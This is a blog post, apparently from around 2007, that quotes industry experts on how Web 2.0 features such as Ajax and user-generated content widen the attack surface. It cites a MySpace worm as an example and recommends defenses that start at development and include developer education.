The mix of Web 2.0 functionality protected by a Web 1.0 security model is going to continue to create some ugly results - A Growing Web's Harder to Secure:
"If you take this Web 2.0 apart, part one is rich user interfaces," says Watchfire founder and CTO Michael Weider, referring to the dynamic scripts now found on many leading Web pages, using Asynchronous JavaScript (Ajax) and other fast applications. "Secondly it's the idea of community, collective intelligence and users participating."Community creation means distributing control to end users. "So history repeats itself. If you distribute control to the users, you're opening yourself to more vulnerabilities," says another security software exec, Dave Shackleford, chief security architect at software maker Vigilar. "The ability to dynamically update code on the fly is obviously going to open itself up to the ability to inject code from malicious sources. Cross-site scripting attacks are prevalent for exactly this reason."
Exhibit A is a worm that crawled across MySpace, the pre-eminent social networking community site, just before last Christmas. It used an exploit in QuickTime video software, using imbeds in an infected clip to alter the viewers' profile, which then created altered links on the profile page to dupe other users into going to phishing sites. "The idea is that they weren't targeting individual computers," says Chris Boyd, the UK-based director of malware research at FaceTime. "They were targeting the Web 2.0 services themselves. They get the same result. And there's nothing yet really to protect against it. In terms of its effect, the only way to protect yourself against this kind of thing is to not use MySpace. You can't get a bigger impact than not being able to use something."
..."You can put up nice content and bad content," Watchfire's Weider says. "The attack in a Web 2.0 situation is someone uploading nasty content and then poisoning the site for everyone else who hits on it."
...
The defenses, sources say, have to start in the development. As outlined in a recent report from Net Square founder Shreeraj Shah, the new rich interfaces with complex scripts make it difficult to identify application logic and resources buried within them-RSS feeds leading into an application surface constantly bring in data, code and information from multiple sources.This makes scanning for malicious code a real challenge. From a tech perspective, firewalls, antivirus software that search for signature code patterns and network monitoring aren't really going to be that effective in the case of Web 2.0. Scanning is going to have to rely on technology and library fingerprinting, Shah reports.
This means mapping known vulnerabilities and clearly "printing" the Ajax and Flash libraries that create many Web 2.0 applications. It also means clearly identifying where third-party information, in the form of feeds, updates or community interaction, is coming from and having a clear understanding of which are trusted sources and which are not trustworthy, and more closely scrutinizing the "untrusted" feeds.
Access points to Document Object Model contexts, the collection of objects that represents a page in a browser-and which can be manipulated by JavaScripts-need to be clearly identified and understood.
Still, just now corporate America is experimenting with Web 2.0, Weider says, in pockets of development. Now is the time to take a more basic approach than depending on software fixes and defenses later. "Developers don't think of security in the same breath that they do for adding features and shipping code on time. The biggest thing to do is to educate your organization of Web application security, period," he says.
So let's do the math, we have rich Web 2.0 and its rich UI and lots of disparate data and links, we are protecting these brand new 2007-built apps with a Web 1.0 security model that was invented in 1995. This would not be a bad thing at all if the attacker community had learned nothing in the last 12 years, alas they have already upgraded to attacker 3.0, and so can use Web 2.0 to both attack and distribute attacks.
2.0 functionality, 1.0 security, 3.0 attackers. this cannot stand.
Comments